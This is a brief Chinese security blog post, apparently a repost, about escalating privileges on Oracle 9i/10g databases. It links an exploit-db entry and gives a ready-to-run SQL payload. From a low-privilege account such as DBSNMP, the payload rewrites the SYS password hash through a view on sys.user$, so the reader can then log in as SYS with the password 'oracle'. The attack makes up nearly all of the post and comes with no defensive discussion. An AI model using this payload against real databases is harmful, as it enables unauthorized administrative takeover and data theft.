Oracle 9i/10g Oracle越权修改SYS密码

没穿底裤 2020年1月1日04:03:11评论350 views字数 306阅读1分1秒阅读模式
摘要

exp地址https://www.exploit-db.com/exploits/4203/
首先用一个低权限账户比如DBSNMP登录Oracle
然后执行SQL

exp地址https://www.exploit-db.com/exploits/4203/
首先用一个低权限账户比如DBSNMP登录Oracle
然后执行SQL

create or replace view bunkerview as  select x.name,x.password from sys.user$ x left outer join sys.user$ y on x.name=y.name;  update bunkerview set password='8A8F025737A9097A' where name='SYS';  drop view bunkerview;  commit;

就可以用sys账户密码为oracle开开心心地登录Oracle了

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日04:03:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Oracle 9i/10g Oracle越权修改SYS密码https://cn-sec.com/archives/76458.html

发表评论

匿名网友 填写信息